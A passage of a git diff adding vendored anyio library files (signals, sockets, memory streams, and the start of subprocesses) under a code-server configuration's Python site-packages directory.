cancelled scope. + + Doing this closes the resource without waiting on anything. + + :param resource: the resource to close + + """ + with CancelScope() as scope: + scope.cancel() + await resource.aclose() diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_signals.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_signals.py new file mode 100755 index 0000000..e24c79e --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_signals.py @@ -0,0 +1,29 @@ +from __future__ import annotations + +from collections.abc import AsyncIterator +from contextlib import AbstractContextManager +from signal import Signals + +from ._eventloop import get_async_backend + + +def open_signal_receiver( + *signals: Signals, +) -> AbstractContextManager[AsyncIterator[Signals]]: + """ + Start receiving operating system signals. + + :param signals: signals to receive (e.g. ``signal.SIGINT``) + :return: an asynchronous context manager for an asynchronous iterator which yields + signal numbers + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + .. warning:: Windows does not support signals natively so it is best to avoid + relying on this in cross-platform applications. + + .. warning:: On asyncio, this permanently replaces any previous signal handler for + the given signals, as set via :meth:`~asyncio.loop.add_signal_handler`. + + """ + return get_async_backend().open_signal_receiver(*signals) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_sockets.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_sockets.py new file mode 100755 index 0000000..6c99b3a --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_sockets.py @@ -0,0 +1,1003 @@ +from __future__ import annotations + +import errno +import os +import socket +import ssl +import stat +import sys +from collections.abc import Awaitable +from dataclasses import dataclass +from ipaddress import IPv4Address, IPv6Address, ip_address +from os import PathLike, chmod +from socket import AddressFamily, SocketKind +from typing import TYPE_CHECKING, Any, Literal, cast, overload + +from .. import ConnectionFailed, to_thread +from ..abc import ( + ByteStreamConnectable, + ConnectedUDPSocket, + ConnectedUNIXDatagramSocket, + IPAddressType, + IPSockAddrType, + SocketListener, + SocketStream, + UDPSocket, + UNIXDatagramSocket, + UNIXSocketStream, +) +from ..streams.stapled import MultiListener +from ..streams.tls import TLSConnectable, TLSStream +from ._eventloop import get_async_backend +from ._resources import aclose_forcefully +from ._synchronization import Event +from ._tasks import create_task_group, move_on_after + +if TYPE_CHECKING: + from _typeshed import FileDescriptorLike +else: + FileDescriptorLike = object + +if sys.version_info < (3, 11): + from exceptiongroup import ExceptionGroup + +if sys.version_info >= (3, 12): + from typing import override +else: + from typing_extensions import override + +if sys.version_info < (3, 13): + from typing_extensions import deprecated +else: + from warnings import deprecated + +IPPROTO_IPV6 = getattr(socket, "IPPROTO_IPV6", 41) # https://bugs.python.org/issue29515 + +AnyIPAddressFamily = Literal[ + AddressFamily.AF_UNSPEC, AddressFamily.AF_INET, AddressFamily.AF_INET6 +] +IPAddressFamily = Literal[AddressFamily.AF_INET, AddressFamily.AF_INET6] + + +# tls_hostname given +@overload +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = ..., + ssl_context: ssl.SSLContext | None = ..., + tls_standard_compatible: bool = ..., + tls_hostname: str, + happy_eyeballs_delay: float = ..., +) -> TLSStream: ... + + +# ssl_context given +@overload +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = ..., + ssl_context: ssl.SSLContext, + tls_standard_compatible: bool = ..., + tls_hostname: str | None = ..., + happy_eyeballs_delay: float = ..., +) -> TLSStream: ... + + +# tls=True +@overload +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = ..., + tls: Literal[True], + ssl_context: ssl.SSLContext | None = ..., + tls_standard_compatible: bool = ..., + tls_hostname: str | None = ..., + happy_eyeballs_delay: float = ..., +) -> TLSStream: ... + + +# tls=False +@overload +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = ..., + tls: Literal[False], + ssl_context: ssl.SSLContext | None = ..., + tls_standard_compatible: bool = ..., + tls_hostname: str | None = ..., + happy_eyeballs_delay: float = ..., +) -> SocketStream: ... + + +# No TLS arguments +@overload +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = ..., + happy_eyeballs_delay: float = ..., +) -> SocketStream: ... + + +async def connect_tcp( + remote_host: IPAddressType, + remote_port: int, + *, + local_host: IPAddressType | None = None, + tls: bool = False, + ssl_context: ssl.SSLContext | None = None, + tls_standard_compatible: bool = True, + tls_hostname: str | None = None, + happy_eyeballs_delay: float = 0.25, +) -> SocketStream | TLSStream: + """ + Connect to a host using the TCP protocol. + + This function implements the stateless version of the Happy Eyeballs algorithm (RFC + 6555). If ``remote_host`` is a host name that resolves to multiple IP addresses, + each one is tried until one connection attempt succeeds. If the first attempt does + not connected within 250 milliseconds, a second attempt is started using the next + address in the list, and so on. On IPv6 enabled systems, an IPv6 address (if + available) is tried first. + + When the connection has been established, a TLS handshake will be done if either + ``ssl_context`` or ``tls_hostname`` is not ``None``, or if ``tls`` is ``True``. + + :param remote_host: the IP address or host name to connect to + :param remote_port: port on the target host to connect to + :param local_host: the interface address or name to bind the socket to before + connecting + :param tls: ``True`` to do a TLS handshake with the connected stream and return a + :class:`~anyio.streams.tls.TLSStream` instead + :param ssl_context: the SSL context object to use (if omitted, a default context is + created) + :param tls_standard_compatible: If ``True``, performs the TLS shutdown handshake + before closing the stream and requires that the server does this as well. + Otherwise, :exc:`~ssl.SSLEOFError` may be raised during reads from the stream. + Some protocols, such as HTTP, require this option to be ``False``. + See :meth:`~ssl.SSLContext.wrap_socket` for details. + :param tls_hostname: host name to check the server certificate against (defaults to + the value of ``remote_host``) + :param happy_eyeballs_delay: delay (in seconds) before starting the next connection + attempt + :return: a socket stream object if no TLS handshake was done, otherwise a TLS stream + :raises ConnectionFailed: if the connection fails + + """ + # Placed here due to https://github.com/python/mypy/issues/7057 + connected_stream: SocketStream | None = None + + async def try_connect(remote_host: str, event: Event) -> None: + nonlocal connected_stream + try: + stream = await asynclib.connect_tcp(remote_host, remote_port, local_address) + except OSError as exc: + oserrors.append(exc) + return + else: + if connected_stream is None: + connected_stream = stream + tg.cancel_scope.cancel() + else: + await stream.aclose() + finally: + event.set() + + asynclib = get_async_backend() + local_address: IPSockAddrType | None = None + family = socket.AF_UNSPEC + if local_host: + gai_res = await getaddrinfo(str(local_host), None) + family, *_, local_address = gai_res[0] + + target_host = str(remote_host) + try: + addr_obj = ip_address(remote_host) + except ValueError: + addr_obj = None + + if addr_obj is not None: + if isinstance(addr_obj, IPv6Address): + target_addrs = [(socket.AF_INET6, addr_obj.compressed)] + else: + target_addrs = [(socket.AF_INET, addr_obj.compressed)] + else: + # getaddrinfo() will raise an exception if name resolution fails + gai_res = await getaddrinfo( + target_host, remote_port, family=family, type=socket.SOCK_STREAM + ) + + # Organize the list so that the first address is an IPv6 address (if available) + # and the second one is an IPv4 addresses. The rest can be in whatever order. + v6_found = v4_found = False + target_addrs = [] + for af, *_, sa in gai_res: + if af == socket.AF_INET6 and not v6_found: + v6_found = True + target_addrs.insert(0, (af, sa[0])) + elif af == socket.AF_INET and not v4_found and v6_found: + v4_found = True + target_addrs.insert(1, (af, sa[0])) + else: + target_addrs.append((af, sa[0])) + + oserrors: list[OSError] = [] + try: + async with create_task_group() as tg: + for _af, addr in target_addrs: + event = Event() + tg.start_soon(try_connect, addr, event) + with move_on_after(happy_eyeballs_delay): + await event.wait() + + if connected_stream is None: + cause = ( + oserrors[0] + if len(oserrors) == 1 + else ExceptionGroup("multiple connection attempts failed", oserrors) + ) + raise OSError("All connection attempts failed") from cause + finally: + oserrors.clear() + + if tls or tls_hostname or ssl_context: + try: + return await TLSStream.wrap( + connected_stream, + server_side=False, + hostname=tls_hostname or str(remote_host), + ssl_context=ssl_context, + standard_compatible=tls_standard_compatible, + ) + except BaseException: + await aclose_forcefully(connected_stream) + raise + + return connected_stream + + +async def connect_unix(path: str | bytes | PathLike[Any]) -> UNIXSocketStream: + """ + Connect to the given UNIX socket. + + Not available on Windows. + + :param path: path to the socket + :return: a socket stream object + :raises ConnectionFailed: if the connection fails + + """ + path = os.fspath(path) + return await get_async_backend().connect_unix(path) + + +async def create_tcp_listener( + *, + local_host: IPAddressType | None = None, + local_port: int = 0, + family: AnyIPAddressFamily = socket.AddressFamily.AF_UNSPEC, + backlog: int = 65536, + reuse_port: bool = False, +) -> MultiListener[SocketStream]: + """ + Create a TCP socket listener. + + :param local_port: port number to listen on + :param local_host: IP address of the interface to listen on. If omitted, listen on + all IPv4 and IPv6 interfaces. To listen on all interfaces on a specific address + family, use ``0.0.0.0`` for IPv4 or ``::`` for IPv6. + :param family: address family (used if ``local_host`` was omitted) + :param backlog: maximum number of queued incoming connections (up to a maximum of + 2**16, or 65536) + :param reuse_port: ``True`` to allow multiple sockets to bind to the same + address/port (not supported on Windows) + :return: a multi-listener object containing one or more socket listeners + :raises OSError: if there's an error creating a socket, or binding to one or more + interfaces failed + + """ + asynclib = get_async_backend() + backlog = min(backlog, 65536) + local_host = str(local_host) if local_host is not None else None + + def setup_raw_socket( + fam: AddressFamily, + bind_addr: tuple[str, int] | tuple[str, int, int, int], + *, + v6only: bool = True, + ) -> socket.socket: + sock = socket.socket(fam) + try: + sock.setblocking(False) + + if fam == AddressFamily.AF_INET6: + sock.setsockopt(IPPROTO_IPV6, socket.IPV6_V6ONLY, v6only) + + # For Windows, enable exclusive address use. For others, enable address + # reuse. + if sys.platform == "win32": + sock.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1) + else: + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) + + if reuse_port: + sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1) + + # Workaround for #554 + if fam == socket.AF_INET6 and "%" in bind_addr[0]: + addr, scope_id = bind_addr[0].split("%", 1) + bind_addr = (addr, bind_addr[1], 0, int(scope_id)) + + sock.bind(bind_addr) + sock.listen(backlog) + except BaseException: + sock.close() + raise + + return sock + + # We passing type=0 on non-Windows platforms as a workaround for a uvloop bug + # where we don't get the correct scope ID for IPv6 link-local addresses when passing + # type=socket.SOCK_STREAM to getaddrinfo(): + # https://github.com/MagicStack/uvloop/issues/539 + gai_res = await getaddrinfo( + local_host, + local_port, + family=family, + type=socket.SOCK_STREAM if sys.platform == "win32" else 0, + flags=socket.AI_PASSIVE | socket.AI_ADDRCONFIG, + ) + + # The set comprehension is here to work around a glibc bug: + # https://sourceware.org/bugzilla/show_bug.cgi?id=14969 + sockaddrs = sorted({res for res in gai_res if res[1] == SocketKind.SOCK_STREAM}) + + # Special case for dual-stack binding on the "any" interface + if ( + local_host is None + and family == AddressFamily.AF_UNSPEC + and socket.has_dualstack_ipv6() + and any(fam == AddressFamily.AF_INET6 for fam, *_ in gai_res) + ): + raw_socket = setup_raw_socket( + AddressFamily.AF_INET6, ("::", local_port), v6only=False + ) + listener = asynclib.create_tcp_listener(raw_socket) + return MultiListener([listener]) + + errors: list[OSError] = [] + try: + for _ in range(len(sockaddrs)): + listeners: list[SocketListener] = [] + bound_ephemeral_port = local_port + try: + for fam, *_, sockaddr in sockaddrs: + sockaddr = sockaddr[0], bound_ephemeral_port, *sockaddr[2:] + raw_socket = setup_raw_socket(fam, sockaddr) + + # Store the assigned port if an ephemeral port was requested, so + # we'll bind to the same port on all interfaces + if local_port == 0 and len(gai_res) > 1: + bound_ephemeral_port = raw_socket.getsockname()[1] + + listeners.append(asynclib.create_tcp_listener(raw_socket)) + except BaseException as exc: + for listener in listeners: + await listener.aclose() + + # If an ephemeral port was requested but binding the assigned port + # failed for another interface, rotate the address list and try again + if ( + isinstance(exc, OSError) + and exc.errno == errno.EADDRINUSE + and local_port == 0 + and bound_ephemeral_port + ): + errors.append(exc) + sockaddrs.append(sockaddrs.pop(0)) + continue + + raise + + return MultiListener(listeners) + + raise OSError( + f"Could not create {len(sockaddrs)} listeners with a consistent port" + ) from ExceptionGroup("Several bind attempts failed", errors) + finally: + del errors # Prevent reference cycles + + +async def create_unix_listener( + path: str | bytes | PathLike[Any], + *, + mode: int | None = None, + backlog: int = 65536, +) -> SocketListener: + """ + Create a UNIX socket listener. + + Not available on Windows. + + :param path: path of the socket + :param mode: permissions to set on the socket + :param backlog: maximum number of queued incoming connections (up to a maximum of + 2**16, or 65536) + :return: a listener object + + .. versionchanged:: 3.0 + If a socket already exists on the file system in the given path, it will be + removed first. + + """ + backlog = min(backlog, 65536) + raw_socket = await setup_unix_local_socket(path, mode, socket.SOCK_STREAM) + try: + raw_socket.listen(backlog) + return get_async_backend().create_unix_listener(raw_socket) + except BaseException: + raw_socket.close() + raise + + +async def create_udp_socket( + family: AnyIPAddressFamily = AddressFamily.AF_UNSPEC, + *, + local_host: IPAddressType | None = None, + local_port: int = 0, + reuse_port: bool = False, +) -> UDPSocket: + """ + Create a UDP socket. + + If ``port`` has been given, the socket will be bound to this port on the local + machine, making this socket suitable for providing UDP based services. + + :param family: address family (``AF_INET`` or ``AF_INET6``) – automatically + determined from ``local_host`` if omitted + :param local_host: IP address or host name of the local interface to bind to + :param local_port: local port to bind to + :param reuse_port: ``True`` to allow multiple sockets to bind to the same + address/port (not supported on Windows) + :return: a UDP socket + + """ + if family is AddressFamily.AF_UNSPEC and not local_host: + raise ValueError('Either "family" or "local_host" must be given') + + if local_host: + gai_res = await getaddrinfo( + str(local_host), + local_port, + family=family, + type=socket.SOCK_DGRAM, + flags=socket.AI_PASSIVE | socket.AI_ADDRCONFIG, + ) + family = cast(AnyIPAddressFamily, gai_res[0][0]) + local_address = gai_res[0][-1] + elif family is AddressFamily.AF_INET6: + local_address = ("::", 0) + else: + local_address = ("0.0.0.0", 0) + + sock = await get_async_backend().create_udp_socket( + family, local_address, None, reuse_port + ) + return cast(UDPSocket, sock) + + +async def create_connected_udp_socket( + remote_host: IPAddressType, + remote_port: int, + *, + family: AnyIPAddressFamily = AddressFamily.AF_UNSPEC, + local_host: IPAddressType | None = None, + local_port: int = 0, + reuse_port: bool = False, +) -> ConnectedUDPSocket: + """ + Create a connected UDP socket. + + Connected UDP sockets can only communicate with the specified remote host/port, an + any packets sent from other sources are dropped. + + :param remote_host: remote host to set as the default target + :param remote_port: port on the remote host to set as the default target + :param family: address family (``AF_INET`` or ``AF_INET6``) – automatically + determined from ``local_host`` or ``remote_host`` if omitted + :param local_host: IP address or host name of the local interface to bind to + :param local_port: local port to bind to + :param reuse_port: ``True`` to allow multiple sockets to bind to the same + address/port (not supported on Windows) + :return: a connected UDP socket + + """ + local_address = None + if local_host: + gai_res = await getaddrinfo( + str(local_host), + local_port, + family=family, + type=socket.SOCK_DGRAM, + flags=socket.AI_PASSIVE | socket.AI_ADDRCONFIG, + ) + family = cast(AnyIPAddressFamily, gai_res[0][0]) + local_address = gai_res[0][-1] + + gai_res = await getaddrinfo( + str(remote_host), remote_port, family=family, type=socket.SOCK_DGRAM + ) + family = cast(AnyIPAddressFamily, gai_res[0][0]) + remote_address = gai_res[0][-1] + + sock = await get_async_backend().create_udp_socket( + family, local_address, remote_address, reuse_port + ) + return cast(ConnectedUDPSocket, sock) + + +async def create_unix_datagram_socket( + *, + local_path: None | str | bytes | PathLike[Any] = None, + local_mode: int | None = None, +) -> UNIXDatagramSocket: + """ + Create a UNIX datagram socket. + + Not available on Windows. + + If ``local_path`` has been given, the socket will be bound to this path, making this + socket suitable for receiving datagrams from other processes. Other processes can + send datagrams to this socket only if ``local_path`` is set. + + If a socket already exists on the file system in the ``local_path``, it will be + removed first. + + :param local_path: the path on which to bind to + :param local_mode: permissions to set on the local socket + :return: a UNIX datagram socket + + """ + raw_socket = await setup_unix_local_socket( + local_path, local_mode, socket.SOCK_DGRAM + ) + return await get_async_backend().create_unix_datagram_socket(raw_socket, None) + + +async def create_connected_unix_datagram_socket( + remote_path: str | bytes | PathLike[Any], + *, + local_path: None | str | bytes | PathLike[Any] = None, + local_mode: int | None = None, +) -> ConnectedUNIXDatagramSocket: + """ + Create a connected UNIX datagram socket. + + Connected datagram sockets can only communicate with the specified remote path. + + If ``local_path`` has been given, the socket will be bound to this path, making + this socket suitable for receiving datagrams from other processes. Other processes + can send datagrams to this socket only if ``local_path`` is set. + + If a socket already exists on the file system in the ``local_path``, it will be + removed first. + + :param remote_path: the path to set as the default target + :param local_path: the path on which to bind to + :param local_mode: permissions to set on the local socket + :return: a connected UNIX datagram socket + + """ + remote_path = os.fspath(remote_path) + raw_socket = await setup_unix_local_socket( + local_path, local_mode, socket.SOCK_DGRAM + ) + return await get_async_backend().create_unix_datagram_socket( + raw_socket, remote_path + ) + + +async def getaddrinfo( + host: bytes | str | None, + port: str | int | None, + *, + family: int | AddressFamily = 0, + type: int | SocketKind = 0, + proto: int = 0, + flags: int = 0, +) -> list[tuple[AddressFamily, SocketKind, int, str, tuple[str, int]]]: + """ + Look up a numeric IP address given a host name. + + Internationalized domain names are translated according to the (non-transitional) + IDNA 2008 standard. + + .. note:: 4-tuple IPv6 socket addresses are automatically converted to 2-tuples of + (host, port), unlike what :func:`socket.getaddrinfo` does. + + :param host: host name + :param port: port number + :param family: socket family (`'AF_INET``, ...) + :param type: socket type (``SOCK_STREAM``, ...) + :param proto: protocol number + :param flags: flags to pass to upstream ``getaddrinfo()`` + :return: list of tuples containing (family, type, proto, canonname, sockaddr) + + .. seealso:: :func:`socket.getaddrinfo` + + """ + # Handle unicode hostnames + if isinstance(host, str): + try: + encoded_host: bytes | None = host.encode("ascii") + except UnicodeEncodeError: + import idna + + encoded_host = idna.encode(host, uts46=True) + else: + encoded_host = host + + gai_res = await get_async_backend().getaddrinfo( + encoded_host, port, family=family, type=type, proto=proto, flags=flags + ) + return [ + (family, type, proto, canonname, convert_ipv6_sockaddr(sockaddr)) + for family, type, proto, canonname, sockaddr in gai_res + # filter out IPv6 results when IPv6 is disabled + if not isinstance(sockaddr[0], int) + ] + + +def getnameinfo(sockaddr: IPSockAddrType, flags: int = 0) -> Awaitable[tuple[str, str]]: + """ + Look up the host name of an IP address. + + :param sockaddr: socket address (e.g. (ipaddress, port) for IPv4) + :param flags: flags to pass to upstream ``getnameinfo()`` + :return: a tuple of (host name, service name) + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + .. seealso:: :func:`socket.getnameinfo` + + """ + return get_async_backend().getnameinfo(sockaddr, flags) + + +@deprecated("This function is deprecated; use `wait_readable` instead") +def wait_socket_readable(sock: socket.socket) -> Awaitable[None]: + """ + .. deprecated:: 4.7.0 + Use :func:`wait_readable` instead. + + Wait until the given socket has data to be read. + + .. warning:: Only use this on raw sockets that have not been wrapped by any higher + level constructs like socket streams! + + :param sock: a socket object + :raises ~anyio.ClosedResourceError: if the socket was closed while waiting for the + socket to become readable + :raises ~anyio.BusyResourceError: if another task is already waiting for the socket + to become readable + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().wait_readable(sock.fileno()) + + +@deprecated("This function is deprecated; use `wait_writable` instead") +def wait_socket_writable(sock: socket.socket) -> Awaitable[None]: + """ + .. deprecated:: 4.7.0 + Use :func:`wait_writable` instead. + + Wait until the given socket can be written to. + + This does **NOT** work on Windows when using the asyncio backend with a proactor + event loop (default on py3.8+). + + .. warning:: Only use this on raw sockets that have not been wrapped by any higher + level constructs like socket streams! + + :param sock: a socket object + :raises ~anyio.ClosedResourceError: if the socket was closed while waiting for the + socket to become writable + :raises ~anyio.BusyResourceError: if another task is already waiting for the socket + to become writable + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().wait_writable(sock.fileno()) + + +def wait_readable(obj: FileDescriptorLike) -> Awaitable[None]: + """ + Wait until the given object has data to be read. + + On Unix systems, ``obj`` must either be an integer file descriptor, or else an + object with a ``.fileno()`` method which returns an integer file descriptor. Any + kind of file descriptor can be passed, though the exact semantics will depend on + your kernel. For example, this probably won't do anything useful for on-disk files. + + On Windows systems, ``obj`` must either be an integer ``SOCKET`` handle, or else an + object with a ``.fileno()`` method which returns an integer ``SOCKET`` handle. File + descriptors aren't supported, and neither are handles that refer to anything besides + a ``SOCKET``. + + On backends where this functionality is not natively provided (asyncio + ``ProactorEventLoop`` on Windows), it is provided using a separate selector thread + which is set to shut down when the interpreter shuts down. + + .. warning:: Don't use this on raw sockets that have been wrapped by any higher + level constructs like socket streams! + + :param obj: an object with a ``.fileno()`` method or an integer handle + :raises ~anyio.ClosedResourceError: if the object was closed while waiting for the + object to become readable + :raises ~anyio.BusyResourceError: if another task is already waiting for the object + to become readable + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + return get_async_backend().wait_readable(obj) + + +def wait_writable(obj: FileDescriptorLike) -> Awaitable[None]: + """ + Wait until the given object can be written to. + + :param obj: an object with a ``.fileno()`` method or an integer handle + :raises ~anyio.ClosedResourceError: if the object was closed while waiting for the + object to become writable + :raises ~anyio.BusyResourceError: if another task is already waiting for the object + to become writable + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + .. seealso:: See the documentation of :func:`wait_readable` for the definition of + ``obj`` and notes on backend compatibility. + + .. warning:: Don't use this on raw sockets that have been wrapped by any higher + level constructs like socket streams! + + """ + return get_async_backend().wait_writable(obj) + + +def notify_closing(obj: FileDescriptorLike) -> None: + """ + Call this before closing a file descriptor (on Unix) or socket (on + Windows). This will cause any `wait_readable` or `wait_writable` + calls on the given object to immediately wake up and raise + `~anyio.ClosedResourceError`. + + This doesn't actually close the object – you still have to do that + yourself afterwards. Also, you want to be careful to make sure no + new tasks start waiting on the object in between when you call this + and when it's actually closed. So to close something properly, you + usually want to do these steps in order: + + 1. Explicitly mark the object as closed, so that any new attempts + to use it will abort before they start. + 2. Call `notify_closing` to wake up any already-existing users. + 3. Actually close the object. + + It's also possible to do them in a different order if that's more + convenient, *but only if* you make sure not to have any checkpoints in + between the steps. This way they all happen in a single atomic + step, so other tasks won't be able to tell what order they happened + in anyway. + + :param obj: an object with a ``.fileno()`` method or an integer handle + :raises NoEventLoopError: if no supported asynchronous event loop is running in the + current thread + + """ + get_async_backend().notify_closing(obj) + + +# +# Private API +# + + +def convert_ipv6_sockaddr( + sockaddr: tuple[str, int, int, int] | tuple[str, int], +) -> tuple[str, int]: + """ + Convert a 4-tuple IPv6 socket address to a 2-tuple (address, port) format. + + If the scope ID is nonzero, it is added to the address, separated with ``%``. + Otherwise the flow id and scope id are simply cut off from the tuple. + Any other kinds of socket addresses are returned as-is. + + :param sockaddr: the result of :meth:`~socket.socket.getsockname` + :return: the converted socket address + + """ + # This is more complicated than it should be because of MyPy + if isinstance(sockaddr, tuple) and len(sockaddr) == 4: + host, port, flowinfo, scope_id = sockaddr + if scope_id: + # PyPy (as of v7.3.11) leaves the interface name in the result, so + # we discard it and only get the scope ID from the end + # (https://foss.heptapod.net/pypy/pypy/-/issues/3938) + host = host.split("%")[0] + + # Add scope_id to the address + return f"{host}%{scope_id}", port + else: + return host, port + else: + return sockaddr + + +async def setup_unix_local_socket( + path: None | str | bytes | PathLike[Any], + mode: int | None, + socktype: int, +) -> socket.socket: + """ + Create a UNIX local socket object, deleting the socket at the given path if it + exists. + + Not available on Windows. + + :param path: path of the socket + :param mode: permissions to set on the socket + :param socktype: socket.SOCK_STREAM or socket.SOCK_DGRAM + + """ + path_str: str | None + if path is not None: + path_str = os.fsdecode(path) + + # Linux abstract namespace sockets aren't backed by a concrete file so skip stat call + if not path_str.startswith("\0"): + # Copied from pathlib... + try: + stat_result = os.stat(path) + except OSError as e: + if e.errno not in ( + errno.ENOENT, + errno.ENOTDIR, + errno.EBADF, + errno.ELOOP, + ): + raise + else: + if stat.S_ISSOCK(stat_result.st_mode): + os.unlink(path) + else: + path_str = None + + raw_socket = socket.socket(socket.AF_UNIX, socktype) + raw_socket.setblocking(False) + + if path_str is not None: + try: + await to_thread.run_sync(raw_socket.bind, path_str, abandon_on_cancel=True) + if mode is not None: + await to_thread.run_sync(chmod, path_str, mode, abandon_on_cancel=True) + except BaseException: + raw_socket.close() + raise + + return raw_socket + + +@dataclass +class TCPConnectable(ByteStreamConnectable): + """ + Connects to a TCP server at the given host and port. + + :param host: host name or IP address of the server + :param port: TCP port number of the server + """ + + host: str | IPv4Address | IPv6Address + port: int + + def __post_init__(self) -> None: + if self.port < 1 or self.port > 65535: + raise ValueError("TCP port number out of range") + + @override + async def connect(self) -> SocketStream: + try: + return await connect_tcp(self.host, self.port) + except OSError as exc: + raise ConnectionFailed( + f"error connecting to {self.host}:{self.port}: {exc}" + ) from exc + + +@dataclass +class UNIXConnectable(ByteStreamConnectable): + """ + Connects to a UNIX domain socket at the given path. + + :param path: the file system path of the socket + """ + + path: str | bytes | PathLike[str] | PathLike[bytes] + + @override + async def connect(self) -> UNIXSocketStream: + try: + return await connect_unix(self.path) + except OSError as exc: + raise ConnectionFailed(f"error connecting to {self.path!r}: {exc}") from exc + + +def as_connectable( + remote: ByteStreamConnectable + | tuple[str | IPv4Address | IPv6Address, int] + | str + | bytes + | PathLike[str], + /, + *, + tls: bool = False, + ssl_context: ssl.SSLContext | None = None, + tls_hostname: str | None = None, + tls_standard_compatible: bool = True, +) -> ByteStreamConnectable: + """ + Return a byte stream connectable from the given object. + + If a bytestream connectable is given, it is returned unchanged. + If a tuple of (host, port) is given, a TCP connectable is returned. + If a string or bytes path is given, a UNIX connectable is returned. + + If ``tls=True``, the connectable will be wrapped in a + :class:`~.streams.tls.TLSConnectable`. + + :param remote: a connectable, a tuple of (host, port) or a path to a UNIX socket + :param tls: if ``True``, wrap the plaintext connectable in a + :class:`~.streams.tls.TLSConnectable`, using the provided TLS settings) + :param ssl_context: if ``tls=True``, the SSLContext object to use (if not provided, + a secure default will be created) + :param tls_hostname: if ``tls=True``, host name of the server to use for checking + the server certificate (defaults to the host portion of the address for TCP + connectables) + :param tls_standard_compatible: if ``False`` and ``tls=True``, makes the TLS stream + skip the closing handshake when closing the connection, so it won't raise an + exception if the server does the same + + """ + connectable: TCPConnectable | UNIXConnectable | TLSConnectable + if isinstance(remote, ByteStreamConnectable): + return remote + elif isinstance(remote, tuple) and len(remote) == 2: + connectable = TCPConnectable(*remote) + elif isinstance(remote, (str, bytes, PathLike)): + connectable = UNIXConnectable(remote) + else: + raise TypeError(f"cannot convert {remote!r} to a connectable") + + if tls: + if not tls_hostname and isinstance(connectable, TCPConnectable): + tls_hostname = str(connectable.host) + + connectable = TLSConnectable( + connectable, + ssl_context=ssl_context, + hostname=tls_hostname, + standard_compatible=tls_standard_compatible, + ) + + return connectable diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_streams.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_streams.py new file mode 100755 index 0000000..2b9c7df --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_streams.py @@ -0,0 +1,52 @@ +from __future__ import annotations + +import math +from typing import TypeVar +from warnings import warn + +from ..streams.memory import ( + MemoryObjectReceiveStream, + MemoryObjectSendStream, + _MemoryObjectStreamState, +) + +T_Item = TypeVar("T_Item") + + +class create_memory_object_stream( + tuple[MemoryObjectSendStream[T_Item], MemoryObjectReceiveStream[T_Item]], +): + """ + Create a memory object stream. + + The stream's item type can be annotated like + :func:`create_memory_object_stream[T_Item]`. + + :param max_buffer_size: number of items held in the buffer until ``send()`` starts + blocking + :param item_type: old way of marking the streams with the right generic type for + static typing (does nothing on AnyIO 4) + + .. deprecated:: 4.0 + Use ``create_memory_object_stream[YourItemType](...)`` instead. + :return: a tuple of (send stream, receive stream) + + """ + + def __new__( # type: ignore[misc] + cls, max_buffer_size: float = 0, item_type: object = None + ) -> tuple[MemoryObjectSendStream[T_Item], MemoryObjectReceiveStream[T_Item]]: + if max_buffer_size != math.inf and not isinstance(max_buffer_size, int): + raise ValueError("max_buffer_size must be either an integer or math.inf") + if max_buffer_size < 0: + raise ValueError("max_buffer_size cannot be negative") + if item_type is not None: + warn( + "The item_type argument has been deprecated in AnyIO 4.0. " + "Use create_memory_object_stream[YourItemType](...) instead.", + DeprecationWarning, + stacklevel=2, + ) + + state = _MemoryObjectStreamState[T_Item](max_buffer_size) + return (MemoryObjectSendStream(state), MemoryObjectReceiveStream(state)) diff --git a/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_subprocesses.py b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_subprocesses.py new file mode 100755 index 0000000..36d9b30 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/anyio/_core/_subprocesses.py @@ -0,0 +1,202 @@ +from __future__ import annotations + +import sys +from collections.abc import AsyncIterable, Iterable, Mapping, Sequence +from io import BytesIO +from os import PathLike +from subprocess import PIPE, CalledProcessError, CompletedProcess +from typing import IO, Any, Union, cast + +from ..abc import Process +from ._eventloop import get_async_backend +from ._tasks import create_task_group + +if sys.version_info >= (3, 10): + from typing import TypeAlias +else: + from typing_extensions import TypeAlias + +StrOrBytesPath: TypeAlias = Union[str, bytes, "PathLike[str]", "PathLike[bytes]"] + + +async def run_process( + command: StrOrBytesPath | Sequence[StrOrBytesPath], + *, + input: bytes | None = None, + stdin: int | IO[Any] | None = None, + stdout: int | IO[Any] | None = PIPE, + stderr: int | IO[Any] | None = PIPE, + check: bool = True, + cwd: StrOrBytesPath | None = None, + env: Mapping[str, str] | None = None, + startupinfo: Any = None, + creationflags: int = 0, + start_new_session: bool = False, + pass_fds: Sequence[int] = (), + user: str | int | None = None, + group: str | int | None = None, + extra_groups: Iterable[str | int] | None = None, + umask: int = -1, +) -> CompletedProcess[bytes]: + """ + Run an external command in a subprocess and wait until it completes. + + .. seealso:: :func:`subprocess.run` + + :param command: either a string to pass to the shell, or an iterable of strings + containing the executable name or path and its arguments + :param input: bytes passed to the standard input of the subprocess 